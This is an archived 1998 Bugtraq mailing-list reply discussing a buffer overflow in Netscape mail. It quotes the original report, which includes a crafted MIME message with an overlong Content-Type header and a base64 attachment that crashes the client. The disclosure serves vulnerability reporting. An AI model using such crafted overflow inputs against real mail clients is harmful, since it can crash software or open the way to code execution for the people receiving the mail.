Bugtraq mailing list archives
Re: netscape mail overflow(another one)
From: brett () LARIAT ORG (Brett Glass)
Date: Tue, 28 Jul 1998 23:49:04 -0600
It makes perfect sense that any header field could overflow a limited buffer. I'd assumed that developers would have the sense to check ALL of the buffers used to store headers, but maybe this should be pointed out to them, just to make sure. We may see exploits based on bugs in UUDECODE and BinHex decoders in mailers as well. I'm sure they're there given the overall low quality of the code that these companies are generating (sigh). --Brett Glass At 08:21 PM 7/28/98 +0200, Paul Boehm wrote:
Hi, netscape mail crashes when trying to the attachment from the following pseudo mime mail: From: Paul Boehm <paul () boehm org> To: paul () boehm org Subject: test Mime-Version: 1.0 Content-Type: AAAAAAAAAAAAAAAAAAAAAA...; boundary=ABC123 --ABC123 Content-Type: text/plain; charset=us-ascii test123 --ABC123 Content-Type: application/octet-stream Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="AA" H4sIAA7jvDUAA+3OOQ6EQBBD0Y45hY9QJejiPI1EBhJiuT+LiEeaAEj+SxzYgdfR09PcLMyU JLURdzZX3hopcm49vD6Ks/acZI8/O2zLWmYpTWUbfu/6+Y0/L+uGUn39AQAAAAAAAAAAAAAA AADwvx2CTC7aACgAAA== --ABC-- i suppose this is exploitable, but i don't really know. i only tested this with win95 netscape 4.05. bye, paul -- [ Paul S. Boehm | paul () boehm priv at | http://paul.boehm.org/ | infected@irc ] Money is what gives a programmer his resources. It's an exchange system created by human beings. It surrounds us. Works for us, binds the economy together.
Current thread:
- Re: Fwd: Any user can panic OpenBSD machine Jason Thorpe (Jul 27)
- <Possible follow-ups>
- Re: Fwd: Any user can panic OpenBSD machine Michael Graff (Jul 27)
- Re: Fwd: Any user can panic OpenBSD machine Todd C. Miller (Jul 27)
- Re: Fwd: Any user can panic OpenBSD machine Warner Losh (Jul 27)
- Re: Fwd: Any user can panic OpenBSD machine J.R. Valverde (Jul 28)
- Re: Fwd: Any user can panic OpenBSD machine Felix Schroeter (Jul 28)
- netscape mail overflow(another one) Paul Boehm (Jul 28)
- Re: netscape mail overflow(another one) Brett Glass (Jul 28)
- Re: netscape mail overflow(another one) pedward () WEBCOM COM (Jul 29)
- HP-UX Predictive & Netscape SSL Vulnerabilities Aleph One (Jul 29)
- Long attachment filename exploits: a procmail filter John D. Hardin (Jul 29)
- Crash a redhat 5.1 linux box Zachary Amsden (Jul 29)
- FD's 0..2 and suid/sgid procs (Was: Crash a redhat 5.1 linux box) Joe Zbiciak (Jul 29)
- Re: FD's 0..2 and suid/sgid procs (Was: Crash a redhat 5.1 linux Roger Espel Llima (Jul 30)
- Re: FD's 0..2 and suid/sgid procs (Was: Crash a redhat 5.1 linux Alan Cox (Jul 30)
- Re: FD's 0..2 and suid/sgid procs (Was: Crash a redhat 5.1 linux Pavel Kankovsky (Jul 30)
- Re: Fwd: Any user can panic OpenBSD machine Todd C. Miller (Jul 27)
- Re: netscape mail overflow(another one) Paul Boehm (Jul 29)
- who Paul Boehm (Jul 28)